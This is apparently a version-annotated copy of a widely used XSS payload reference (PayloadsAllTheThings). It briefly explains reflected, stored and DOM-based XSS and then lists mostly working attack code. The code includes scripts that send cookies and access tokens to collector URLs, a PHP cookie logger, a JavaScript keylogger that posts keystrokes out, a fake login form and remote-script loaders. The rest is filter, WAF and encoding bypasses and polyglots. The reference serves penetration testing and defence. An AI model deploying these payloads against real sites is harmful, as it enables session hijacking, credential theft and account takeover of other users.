PayloadsAllTheThings/XSS Injection/README.md

1408 lines
56 KiB
Markdown
Raw Normal View History

2016-10-19 16:39:07 +00:00
# Cross Site Scripting
2018-08-12 21:30:22 +00:00
2022-12-13 21:29:20 +00:00
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
2016-10-18 08:01:56 +00:00
2020-09-05 08:36:58 +00:00
## Summary
2022-08-09 09:05:40 +00:00
- [Cross Site Scripting](#cross-site-scripting)
2022-12-13 21:29:20 +00:00
- [Vulnerability Details](#vulnerability-details)
2022-08-09 09:05:40 +00:00
- [Exploit code or POC](#exploit-code-or-poc)
- [Data grabber for XSS](#data-grabber-for-xss)
- [CORS](#cors)
- [UI redressing](#ui-redressing)
- [Javascript keylogger](#javascript-keylogger)
- [Other ways](#other-ways)
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
- [Tools](#tools)
- [XSS in HTML/Applications](#xss-in-htmlapplications)
- [Common Payloads](#common-payloads)
- [XSS using HTML5 tags](#xss-using-html5-tags)
- [XSS using a remote JS](#xss-using-a-remote-js)
- [XSS in hidden input](#xss-in-hidden-input)
- [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized)
- [DOM based XSS](#dom-based-xss)
- [XSS in JS Context](#xss-in-js-context)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files](#xss-in-files)
- [XSS in XML](#xss-in-xml)
- [XSS in SVG](#xss-in-svg)
- [XSS in SVG (short)](#xss-in-svg-short)
- [XSS in Markdown](#xss-in-markdown)
- [XSS in SWF flash application](#xss-in-swf-flash-application)
- [XSS in SWF flash application](#xss-in-swf-flash-application-1)
- [XSS in CSS](#xss-in-css)
- [XSS in PostMessage](#xss-in-postmessage)
- [Blind XSS](#blind-xss)
- [XSS Hunter](#xss-hunter)
- [Other Blind XSS tools](#other-blind-xss-tools)
- [Blind XSS endpoint](#blind-xss-endpoint)
- [Tips](#tips)
- [Mutated XSS](#mutated-xss)
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads)
- [Bypass case sensitive](#bypass-case-sensitive)
- [Bypass tag blacklist](#bypass-tag-blacklist)
- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
- [Bypass quotes for string](#bypass-quotes-for-string)
- [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist)
- [Bypass space filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter)
- [Bypass document blacklist](#bypass-document-blacklist)
- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist)
2022-08-09 09:05:40 +00:00
- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
- [Bypass ">" using nothing](#bypass--using-nothing)
- [Bypass "<" and ">" using and ](#bypass--and--using--and-)
- [Bypass ";" using another character](#bypass--using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding)
2023-05-31 12:18:25 +00:00
- [Bypass using Katakana](#bypass-using-katakana)
2022-08-09 09:05:40 +00:00
- [Bypass using Cuneiform](#bypass-using-cuneiform)
- [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
- [Bypass using Unicode](#bypass-using-unicode)
- [Bypass using UTF-7](#bypass-using-utf-7)
- [Bypass using UTF-8](#bypass-using-utf-8)
- [Bypass using UTF-16be](#bypass-using-utf-16be)
- [Bypass using UTF-32](#bypass-using-utf-32)
- [Bypass using BOM](#bypass-using-bom)
- [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
- [Bypass using jsfuck](#bypass-using-jsfuck)
- [CSP Bypass](#csp-bypass)
- [Bypass CSP using JSONP](#bypass-csp-using-jsonp)
- [Bypass CSP default-src](#bypass-csp-default-src)
- [Bypass CSP inline eval](#bypass-csp-inline-eval)
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
2022-08-09 09:05:40 +00:00
- [Common WAF Bypass](#common-waf-bypass)
- [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
- [25st January 2021](#25st-january-2021)
- [21st April 2020](#21st-april-2020)
- [22nd August 2019](#22nd-august-2019)
- [5th June 2019](#5th-june-2019)
- [3rd June 2019](#3rd-june-2019)
- [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10)
- [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018)
- [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018)
- [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018)
- [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018)
- [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019)
- [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018)
- [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018)
- [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018)
- [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
- [References](#references)
2018-03-23 12:53:53 +00:00
2022-12-13 21:29:20 +00:00
## Vulnerability Details
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
There are 3 main types of XSS attacks:
* **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
* **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
* **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.
To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.
2020-10-27 12:31:37 +00:00
2016-10-19 16:39:07 +00:00
## Exploit code or POC
2016-10-18 08:01:56 +00:00
### Data grabber for XSS
2018-08-12 21:30:22 +00:00
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
```html
2018-10-31 21:34:10 +00:00
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
2018-10-31 21:34:10 +00:00
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
```
2016-10-19 16:39:07 +00:00
Write the collected data into a file.
```php
<?php
2016-10-19 16:39:07 +00:00
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
2020-09-05 08:36:58 +00:00
fwrite($fp, 'Cookie:' .$cookie."\r\n");
2016-10-19 16:39:07 +00:00
fclose($fp);
?>
```
2021-04-21 20:27:07 +00:00
### CORS
```html
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>
```
2020-09-05 08:36:58 +00:00
### UI redressing
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
```html
<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>
```
### Javascript keylogger
Another way to collect sensitive data is to set a javascript keylogger.
2018-08-12 21:30:22 +00:00
2018-08-13 11:07:37 +00:00
```javascript
2017-07-30 11:17:00 +00:00
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
```
### Other ways
2018-03-25 21:51:22 +00:00
More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
2018-08-12 21:30:22 +00:00
- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
2018-03-25 21:51:22 +00:00
2017-10-21 14:48:17 +00:00
## Identify an XSS endpoint
2018-08-12 21:30:22 +00:00
2022-08-09 09:05:40 +00:00
This payload opens the debugger in the developer console rather than triggering a popup alert box.
2018-06-27 18:00:17 +00:00
```javascript
2017-10-21 14:48:17 +00:00
<script>debugger;</script>
```
Modern applications with content hosting can use [sandbox domains][sandbox-domains]
> to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.
[sandbox-domains]:https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html
For this reason, it's better to use `alert(document.domain)` or `alert(window.origin)` rather than `alert(1)` as default XSS payload in order to know in which scope the XSS is actually executing.
Better payload replacing `<script>alert(1)</script>`:
```html
<script>alert(document.domain.concat("\n").concat(window.origin))</script>
```
2022-08-09 09:05:40 +00:00
While `alert()` is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so `console.log()` can be used instead to display a message in the console of the developer console (doesn't require any interaction).
Example:
```html
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
```
References:
- [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
- [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/)
2020-10-27 12:31:37 +00:00
### Tools
2020-10-27 13:10:35 +00:00
Most tools are also suitable for blind XSS attacks:
2020-10-27 12:31:37 +00:00
* [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained
* [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities
* [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go
* [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby
2020-10-27 13:10:35 +00:00
* [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester
2020-10-27 12:31:37 +00:00
## XSS in HTML/Applications
2018-08-12 21:30:22 +00:00
2020-07-12 12:44:33 +00:00
### Common Payloads
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2020-07-12 12:44:33 +00:00
// Basic payload
2016-10-19 16:39:07 +00:00
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
2021-07-22 12:47:36 +00:00
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
2021-07-22 14:55:03 +00:00
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
2021-09-02 13:14:29 +00:00
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
2016-10-19 16:39:07 +00:00
2020-07-12 12:44:33 +00:00
// Img payload
2016-10-19 16:39:07 +00:00
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
2016-10-19 16:39:07 +00:00
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
2023-11-01 15:32:31 +00:00
<><img src=1 onerror=alert(1)>
2016-10-19 16:39:07 +00:00
2020-07-12 12:44:33 +00:00
// Svg payload
2016-10-19 16:39:07 +00:00
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
2016-10-19 16:39:07 +00:00
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
2020-05-06 18:27:55 +00:00
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
2021-07-31 09:28:23 +00:00
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;
2019-08-01 12:39:15 +00:00
2020-07-12 12:44:33 +00:00
// Div payload
2019-08-01 12:39:15 +00:00
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
2016-10-19 16:39:07 +00:00
```
2020-07-12 12:44:33 +00:00
### XSS using HTML5 tags
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<body onload=alert(/XSS/.source)>
2016-10-19 16:39:07 +00:00
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
2018-10-18 15:32:01 +00:00
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
2016-10-19 16:39:07 +00:00
```
2020-07-12 12:44:33 +00:00
### XSS using a remote JS
2018-08-12 21:30:22 +00:00
2020-07-12 12:44:33 +00:00
```html
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
<script src=14.rs>
2020-07-12 12:44:33 +00:00
// you can also specify an arbitrary payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
2016-10-19 16:39:07 +00:00
2020-07-12 12:44:33 +00:00
### XSS in hidden input
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-20 23:12:00 +00:00
<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event
```
2016-10-19 16:39:07 +00:00
### XSS when payload is reflected capitalized
```javascript
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
```
2020-07-12 12:44:33 +00:00
### DOM based XSS
Based on a DOM XSS sink.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
#"><img src=/ onerror=alert(2)>
```
2020-09-05 08:36:58 +00:00
### XSS in JS Context
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
-(confirm)(document.domain)//
; alert(1);//
2020-07-12 12:44:33 +00:00
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
```
2016-11-11 09:03:35 +00:00
## XSS in wrappers javascript and data URI
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
XSS with javascript:
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-19 16:39:07 +00:00
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
2016-11-17 03:50:34 +00:00
We can encode the "javascript:" in Hex/Octal
2016-11-17 03:50:34 +00:00
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
We can use a 'newline character'
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
Using the escape character
2018-06-27 18:00:17 +00:00
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
2016-11-17 03:50:34 +00:00
2016-12-03 18:03:59 +00:00
Using the newline and a comment //
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
2016-10-19 16:39:07 +00:00
```
XSS with data:
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-11-11 09:03:35 +00:00
data:text/html,<script>alert(0)</script>
2016-10-19 16:39:07 +00:00
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
2018-02-23 12:48:51 +00:00
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
2016-10-19 16:39:07 +00:00
```
2016-12-03 18:03:59 +00:00
XSS with vbscript: only IE
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-12-03 18:03:59 +00:00
vbscript:msgbox("XSS")
```
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
## XSS in files
2018-08-12 21:30:22 +00:00
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```xml
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
```
2019-08-03 21:22:14 +00:00
### XSS in XML
2018-06-27 18:00:17 +00:00
```xml
2016-10-19 16:39:07 +00:00
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>
```
2019-08-03 21:22:14 +00:00
### XSS in SVG
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```xml
2016-10-19 16:39:07 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
2018-08-13 10:01:13 +00:00
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
2016-10-19 16:39:07 +00:00
</svg>
```
2019-08-03 21:22:14 +00:00
### XSS in SVG (short)
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-19 16:39:07 +00:00
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
2017-11-19 13:01:36 +00:00
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
2016-10-19 16:39:07 +00:00
```
2019-08-03 21:22:14 +00:00
### XSS in Markdown
```csharp
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
2019-08-03 21:22:14 +00:00
### XSS in SWF flash application
2018-08-12 21:30:22 +00:00
```powershell
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);
```
2016-10-19 16:39:07 +00:00
2018-08-12 21:30:22 +00:00
more payloads in ./files
2016-10-19 16:39:07 +00:00
2019-08-03 21:22:14 +00:00
### XSS in SWF flash application
2018-08-12 21:30:22 +00:00
2018-08-13 11:07:37 +00:00
```
2018-02-23 12:48:51 +00:00
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
```
2019-08-03 21:22:14 +00:00
### XSS in CSS
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```html
2018-03-23 12:53:53 +00:00
<!DOCTYPE html>
2016-10-31 07:55:37 +00:00
<html>
<head>
2018-03-23 12:53:53 +00:00
<style>
div {
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
}
</style>
2016-10-31 07:55:37 +00:00
</head>
2018-03-23 12:53:53 +00:00
<body>
<div>lol</div>
</body>
2016-10-31 07:55:37 +00:00
</html>
```
2019-08-03 21:22:14 +00:00
## XSS in PostMessage
> If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
```html
<html>
<body>
<input type=button value="Click Me" id="btn">
</body>
<script>
document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login');
setTimeout(function(){
window.poc.postMessage(
{
"sender": "accounts",
"url": "javascript:confirm('XSS')",
},
'*'
);
}, 2000);
}
</script>
</html>
```
## Blind XSS
### XSS Hunter
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
2023-02-11 16:49:55 +00:00
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
You can set up an alternative version
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
2022-11-07 09:10:21 +00:00
```xml
2023-02-11 16:49:55 +00:00
"><script src="https://js.rip/<custom.name>"></script>
"><script src=//<custom.subdomain>.xss.ht></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
```
### Other Blind XSS tools
- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy)
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS)
- [ezXSS - ssl](https://github.com/ssl/ezXSS)
### Blind XSS endpoint
- Contact forms
- Ticket support
- Referer Header
- Custom Site Analytics
- Administrative Panel logs
- User Agent
- Custom Site Analytics
- Administrative Panel logs
- Comment Box
- Administrative Panel
2021-06-16 11:25:46 +00:00
### Tips
2021-06-16 19:24:17 +00:00
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
2021-06-16 11:25:46 +00:00
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
2019-11-06 17:32:29 +00:00
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.
```javascript
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
```
2016-10-19 16:39:07 +00:00
## Polyglot XSS
2018-08-12 21:30:22 +00:00
2016-10-19 16:39:07 +00:00
Polyglot XSS - 0xsobky
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-19 16:39:07 +00:00
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
Polyglot XSS - Ashar Javed
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2018-08-13 11:07:37 +00:00
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
2016-10-19 16:39:07 +00:00
```
Polyglot XSS - Mathias Karlsson
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
2016-10-19 16:39:07 +00:00
```
Polyglot XSS - Rsnake
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
Polyglot XSS - Daniel Miessler
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
2016-10-19 16:39:07 +00:00
```
2018-02-23 12:48:51 +00:00
